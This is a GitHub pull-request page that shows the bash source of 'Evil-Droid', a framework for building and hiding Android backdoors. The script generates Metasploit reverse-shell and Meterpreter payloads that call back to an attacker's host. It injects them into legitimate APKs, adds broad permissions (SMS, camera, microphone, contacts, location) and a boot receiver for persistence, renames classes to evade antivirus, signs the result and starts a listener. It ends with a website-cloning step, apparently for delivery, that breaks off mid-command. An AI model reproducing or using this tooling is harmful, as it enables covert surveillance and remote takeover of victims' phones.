999 #48
Open
vin999999999
wants to merge
1
commit into
M4sc3r4n0:master
from
vin999999999:patch-4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
#!/usr/bin/env bash # # Evil-Droid Framework . version 0.3 # Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform # # Created By Mascerano Bachir . # Website: http://www.dev-labs.co # YTB : https://www.youtube.com/c/mascerano%20bachir # FCB : https://www.facebook.com/kali.linux.pentesting.tutorials #Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine # # this is an open source tool if you want to modify or add something . Please give me a copy. # resize terminal window resize -s 40 70 > /dev/null #Colors cyan='\e[0;36m' lightcyan='\e[96m' green='\e[0;32m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' blue='\e[1;34m' Escape="\033"; white="${Escape}[0m"; RedF="${Escape}[31m"; GreenF="${Escape}[32m"; LighGreenF="${Escape}[92m" YellowF="${Escape}[33m"; BlueF="${Escape}[34m"; CyanF="${Escape}[36m"; Reset="${Escape}[0m"; # Check root [[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; } clear # check internet function checkinternet() { ping -c 1 baidu.com > /dev/null 2>&1 if [[ "$?" 
!= 0 ]] then echo -e $yellow " Checking For Internet: ${RedF}SUCSESS" echo echo -e $red "This Script Needs An Active Internet Connection" echo echo -e $red " Enter Evil-Droid " echo && sleep 2 exit else echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED" fi } checkinternet sleep 2 #Define options path=`pwd` lanip=`hostname -I` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` ver="v0.3" APKTOOL="$path/tools/apktool.jar" VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1 VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2 VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3 VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload' VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit' perms=' <uses-permission android:name="android.permission.INTERNET"/>\n <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>\n <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>\n <uses-permission android:name="android.permission.READ_PHONE_STATE"/>\n <uses-permission android:name="android.permission.SEND_SMS"/>\n <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n <uses-permission android:name="android.permission.CALL_PHONE"/>\n <uses-permission android:name="android.permission.READ_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_SETTINGS"/>\n 
<uses-permission android:name="android.permission.CAMERA"/>\n <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>\n <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>\n <uses-permission android:name="android.permission.SET_WALLPAPER"/>\n <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>\n <uses-permission android:name="android.permission.WAKE_LOCK"/>\n <uses-permission android:name="android.permission.READ_SMS"/>' echo "" sleep 1 # spinner for Metasploit Generator spinlong () { bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } # detect ctrl+c exiting trap ctrl_c INT ctrl_c() { clear echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... " echo -e $red"[*] Stopping Services... " apache_svc_stop postgresql_stop sleep 1 echo "" echo -e $yellow"[*] Thanks For Using Evil-Droid :)" exit } #detect system echo -e $blue sudo cat /etc/issue.net #check dependencies existence echo -e $blue "" echo "® Checking dependencies configuration ®" echo " " # check if metasploit-framework is installed which msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]" which msfconsole > /dev/null 2>&1 sleep 2 else echo -e $red "[ X ] Metasploit-Framework -> ${RedF}not found " echo -e $yellow "[ ! ] Installing Metasploit-Framework " sudo apt-get install metasploit-framework -y echo -e $blue "[ ✔ ] Done installing ...." which msfconsole > /dev/null 2>&1 sleep 2 fi #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]" which xterm > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] xterm -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Xterm " sleep 2 echo -e $green "" sudo apt-get install xterm -y clear echo -e $blue "[ ✔ ] Done installing .... " which xterm > /dev/null 2>&1 fi #check if zenity is installed which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]" which zenity > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Zenity -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Zenity " sleep 2 echo -e $green "" sudo apt-get install zenity -y clear echo -e $blue "[ ✔ ] Done installing .... " which zenity > /dev/null 2>&1 fi #Check for Android Asset Packaging Tool which aapt > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Aapt -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Aapt " sleep 2 echo -e $green "" sudo apt-get install aapt -y sudo apt-get install android-framework-res -y clear echo -e $blue "[ ✔ ] Done installing .... " which aapt > /dev/null 2>&1 fi #Check for Apktool Reverse Engineering which apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Apktool -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Apktool " sleep 2 echo -e $green "" sudo apt-get install apktool -y clear echo -e $blue "[ ✔ ] Done installing .... " which apktool > /dev/null 2>&1 fi #check for zipalign which zipalign > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Zipalign -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Zipalign " sleep 2 echo -e $green "" sudo apt-get install zipalign -y clear echo -e $blue "[ ✔ ] Done installing .... " which zipalign > /dev/null 2>&1 fi directory="$path/evilapk" if [ ! -d "$directory" ]; then echo "Creating the output directory..." mkdir $directory sleep 3 fi echo -e $red "╔────────────────────────────────────────────────╗" echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |" echo -e $red "| Please do not upload APK to VirusTotal.com |" echo -e $red "┖────────────────────────────────────────────────┙" #function ascii banner function print_ascii_art { echo -e $lightgreen " . . " echo -e $lightgreen " M. .M " echo -e $lightgreen " MMMMMMMMMMM. " echo -e $lightgreen " .MMM\MMMMMMM/MMM. " echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. " echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMMMM.......MMMMMMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMM MMMMM $ver " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " .MMM. .MMM. 
" echo -e $lightgreen " Mascerano Bachir - Dev-labs " } #function lhost function get_lhost() { LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null) } #function lport function get_lport() { LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null) } #function payload function get_payload() { PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null) } function get_payload1() { PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null) } #function name function payload_name() { apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null) } #function original apk function orig_apk() { orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null) } #function change icon function change_icon() { iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "*.png" --text "chose your own icon." 
2> /dev/null) } #function generate payload function gen_payload() { echo -e $yellow "" echo "[*] Generating apk payload" spinlong xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1 } function embed_payload() { echo -e $yellow "" echo "[*] Embeding apk payload in orginal apk" spinlong xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1 } #function update apktool function up_apktook() { echo -e $yellow "" echo "[*] Removing 1.apk framework file..." spinlong apktool empty-framework-dir --force > /dev/null 2>&1 } #function apktool function apk_decomp() { echo -e $yellow "" echo "[*] Decompiling Payload APK..." spinlong xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1 rm $apk_name.apk } function apk_comp() { echo -e $yellow "" echo "[*] Rebuilding APK file..." spinlong xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1 rm -r payload > /dev/null 2>&1 } function apk_decomp1() { echo -e $yellow "" echo "[*] Decompiling Original APK..." spinlong xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1 } function apk_comp1() { echo -e $yellow "" echo "[*] Rebuilding Backdoored APK..." spinlong xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1 rm -r payload > /dev/null 2>&1 rm -r original > /dev/null 2>&1 } #function errors function error() { rc=$? if [ $rc != 0 ]; then echo -e $red "" echo "【X】 Failed to rebuild backdoored apk【X】" echo apache_svc_stop postgresql_stop exit $rc fi } function error0() { rc=$? 
if [ $rc != 0 ]; then echo -e $red "" echo "【X】 An Error Was Occured .Ty Again【X】" echo apache_svc_stop postgresql_stop exit $rc fi } #function apache2 service function apache_svc_start() { service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } function apache_svc_stop() { service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } #function postgresql service function postgresql_start() { service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } function postgresql_stop() { service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } # function adding permission function perms() { echo -e $yellow "" echo "[*] Adding permission and Hook Smali" spinlong package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1 tmp=$package_name sed -i "5i\ $perms" $path/original/AndroidManifest.xml rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1 sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1 rc=$? 
if [ $rc != 0 ];then app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1 app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1 tmp=$app_name sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1 amanifest=" </application>" boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$app_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.stage.MainService'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 fi amanifest=" </application>" boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$package_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.stage.MainService'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 android_nam=$tmp } # functions hook smali function hook_smalies() { launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_activity=`grep -B 
$launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 if [ $android_name ]; then echo echo "##################################################################" echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1 elif [ ! -e $android_activity ]; then echo echo "##################################################################" echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1 rc=$? if [ $rc != 0 ]; then spinlong echo -e $red "" echo "[x] cant find : $android_activity.smali" echo "[*] try another ..." 
spinlong sleep 2 echo echo "##################################################################" echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1 fi fi } #function flagged by av & updating smalies function flagg() { echo -e $yellow "" echo "[*] Scrubbing the payload contents to avoid AV signatures..." spinlong mv payload/smali/com/metasploit payload/smali/com/$VAR1 mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2 mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali sleep 2 if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then echo echo -e $red "[ X ] an error was occured . Please upgrade your distro .." apache_svc_stop postgresql_stop exit 1 fi sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/* sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/* sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml sed -i '/WRITE_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' payload/AndroidManifest.xml } function flagg_original() { echo -e $yellow "" echo "[*] Scrubbing the payload contents to avoid AV signatures..." 
spinlong rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1 mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1 mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali sleep 2 if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then echo echo -e $red "[ X ] an error was occured . Please upgrade your distro .." apache_svc_stop postgresql_stop exit 1 fi echo -e $yellow "" echo "[*] Adding permission and Hook Smali" spinlong sed -i "5i\ $perms" $path/original/AndroidManifest.xml package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1 tmp=$package_name sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1 rc=$? 
if [ $rc != 0 ];then app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1 app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1 tmp=$app_name sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1 amanifest=" </application>" boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$app_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.$VAR1.$VAR3'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 fi amanifest=" </application>" boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$package_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.$VAR1.$VAR3'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 android_nam=$tmp launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" 
$path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 if [ $android_name ]; then echo echo "##################################################################" echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1 elif [ ! -e $android_activity ]; then echo echo "##################################################################" echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1 rc=$? 
if [ $rc != 0 ]; then spinlong echo -e $red "" echo "[x] cant find : $android_activity.smali" echo "[*] try another ..." spinlong sleep 2 echo echo "##################################################################" echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1 fi fi } # function chage name and icon function merge_name_ico() { echo -e $yellow "" echo "[*] Changing name and icon payload..." spinlong label=' <application android:label="@string/app_name">' label1=' <application android:label="@string/app_name" android:icon="@drawable/main_icon">' sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1 sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1 mkdir $path/payload/res/drawable cp $iconos $path/payload/res/drawable/main_icon.png } #function signing apk function sign() { echo -e $yellow "" echo "[*] Checking for ~/.android/debug.keystore for signing..." spinlong if [ ! -f ~/.android/debug.keystore ]; then echo -e $red "" echo " [ X ] Debug key not found. Generating one now..." spinlong if [ ! 
-d "~/.android" ]; then mkdir ~/.android > /dev/null 2>&1 fi echo -e $lightgreen "" keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000 fi spinlong echo -e $yellow "" echo "[*] Attempting to sign the package with your android debug key" spinlong jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1 echo -e $yellow echo "[*] Verifying signed artifacts..." spinlong jarsigner -verify -certs evil.apk > /dev/null 2>&1 rc=$? if [ $rc != 0 ]; then echo -e $red "" echo "[!] Failed to verify signed artifacts" apache_svc_stop postgresql_stop exit $rc fi echo -e $yellow echo "[*] Aligning recompiled APK..." spinlong zipalign 4 evil.apk $apk_name.apk 2>&1 rc=$? echo -e $yellow echo "[✔] Done." spinlong if [ $rc != 0 ]; then echo -e $red "" echo "[!] Failed to align recompiled APK" apache_svc_stop postgresql_stop exit $rc fi rm evil.apk > /dev/null 2>&1 } #function ask function quests() { while true; do echo "" quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" 
--radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null) case $quest in APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;; ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;; esac done } #function listeners function listener() { xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'" } #function clone site function clns() { clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null) } function index_name() { index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null) echo -e $yellow "" echo "[*] Clone Website From URL..." spinlong wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) 